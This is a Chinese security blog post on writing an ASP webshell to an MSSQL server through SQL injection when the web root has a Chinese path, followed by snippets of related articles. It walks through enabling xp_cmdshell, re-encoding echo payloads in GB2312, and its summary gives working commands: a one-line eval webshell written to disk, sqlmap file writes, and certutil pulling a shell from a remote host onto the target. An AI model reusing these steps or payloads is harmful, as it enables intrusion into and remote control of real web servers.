<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    SQLserver寫Webshell總結-突破中文路徑

    VSole2021-10-20 12:47:29

    背景

    目標站:

    發現授權文件,刷新抓包得到一處ajax請求指向了TicketsSellMainHandler.ashx文件

    存在注入

    開始踩坑 本來打算通過注入開啟XP_cmdshell提權拿到源碼 進一步進行審計 通過dir命令得到該站絕對路徑

    發現是中文絕對路徑,這個時候在不考慮powershell上線的方式用echo進行寫馬已經行不通了 mssql調用cmd默認是gb2312編碼,使用sqlmap進行echo寫馬其編碼是UTF-8

    powershell上線 嘗試powershell上線,發現該服務器存在360,上線失敗,暫不考慮bypass

    使用BAT文件寫shell 嘗試使用sqlmap自帶的命令--file-write寫bat文件getshell 這里知道了mssql調用cmd的編碼是gb2312 所以本地的bat文件編碼也要是gb2312

    將本地1.bat文件利用windows的certutil文件寫到對方D盤的1c.bat

    type看看中文是否亂碼

    沒有亂碼,但是在接下來運行bat文件中又踩坑了== 多次測試都發現asp的木馬中 % 文件跟bat不兼容 在本機中測試 發現木馬被寫成了這個樣==

    期間嘗試過沒有%的木馬

    execute request(“MH”) 但是由于該機器的配置原因都失敗 遂放棄

    手工寫shell 將sqlmap代理到burp 抓echo寫馬的數據包

    將這段hex通過UTF-8解碼

    沒有亂碼,同理,如果通過GB2312解碼一定會亂碼,mssql調用cmd使用的便是GB2312編碼 將echo xxx 通過GB2313 hex編碼

    對比之前UTF-8和GB2313編碼的不同

    將burp中原來UTF-8編碼的hex改為GB2313編碼的hex 然后Forward

    這次沒有提示找不到路徑 訪問該shell寫入成功

    certutil下載上線

    與sqlmap --file-write 同理,使用certutil.exe遠程下載木馬到對方D盤 然后start運行即可

    總結

    查找文件

    1、dir/s/b d:\1.txt

    2、for /r "D:" %i in (*.ashx) do echo %i

    3、%windir%\system32\inetsrv\appcmd list VDIR

    寫shell

    1、powershell上線

    2、echo <%eval request("z")%> > d:\測試版本\z.asp

    3、寫bat文件,bat編碼需要更改為gb2312簡體中文。--file-write c:\users\xiu\desktop\1.bat -file-dest d:\1c.bat

    4、certutil.exe -urlcache -split -f http://xxxx.com/1.asp D:\1.txt 遠程下載shell、木馬

    shellwebshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    有效防止入侵者通過腳本上傳危險程序或代碼,讓服務運行于安全狀態。防范入侵者執行危險程序防范提權的發生。禁止危險的組件,讓服務器更安全。防范因網站有注入問題導致服務器給入侵。有效的防止未經允許的擴展名腳本惡意執行,如:CER,CDX 等擴展名的木馬。通過根據一組YARA規則爬行文件系統和測試文件來執行檢測。根據項目計劃會逐步覆蓋服務器資產管理、威脅掃描、Webshell掃描查殺、基線檢測等各項功能。
    SQlMAP --os-shell拿下webshell 眾所周知,--os-shell的使用條件較為苛刻,必須滿足: dba權限 網站絕對路徑 php中的gpc為off,php為自動轉義的狀態
    常見漏洞之命令注入
    2021-12-17 14:21:26
    命令注入通常因為指Web應用在服務器上拼接系統命令而造成的漏洞。該類漏洞通常出現在調用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網關、查看系統信息以及關閉重啟等功能,或者一些站點提供如ping、nslookup、提供發送郵件、轉換圖片等功能都可能出現該類漏洞。
    Redis未授權漏洞
    2021-11-19 22:05:17
    Redis 默認情況下,會綁定在 本地6379端口,如果沒有進行相關策略,會將 Redis 服務暴露到公網上,在沒有設置密碼認證的情況下,任意用戶在可以訪問目標服務器的情況下未授權訪問Redis 以及讀取 Redis 的數據。靶機是Jacky馬的服務器,快到期了就沒脫敏。
    上一篇文章中講述了我是如何從0開始針對Apple的資產進行網站探測、CMS識別、代碼審計、失敗的入侵過程再到WAF繞過的分析,本篇承接上篇,講述RCE利鏈的完整過程。
    本實驗環境靶場以發出,從外到內,給你服務器干翻!
    由于是三層網絡,寫起來圖會比較多,選取了四款常用穿透軟件:ew,nps,frp,venom進行試驗。環境搭建拓撲圖如下:192.168.1.0/24模擬公網環境。每臺PC上都有一個web服務,內網主機除邊緣win7外全部不出網,內網同網段之間的主機可以相互訪問,不同網段相互隔離。
    由于是三層網絡,寫起來圖會比較多,選取了四款常用穿透軟件:ew,nps,frp,venom進行試驗。每臺PC上都有一個web服務,內網主機除邊緣win7外全部不出網,內網同網段之間的主機可以相互訪問,不同網段相互隔離。假設現在已經拿到邊緣主機win7。由于環境中途崩了一次,從Venom開始ip有所變化,請見諒。在攻擊機上執行:ew_for_Win.exe?
    安全從運維走向運營,以業務發展為基礎,以事件核查為線索,以持續優化為根本。此外,后期漏洞修復和處置也需要數天時間才能完成。第一個核心技術是Knowledge-Base,簡稱KB系統。因此,安全人員想要通過檢測配置文件中的版本號來確定是否存在漏洞將會變得非常困難。這是青藤自主研發的面向安全人員的一套語法,極大提高事件分析和響應能力。部署青藤產品之后,安全部門手里的資產信息是整個公司最全和最準確的。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类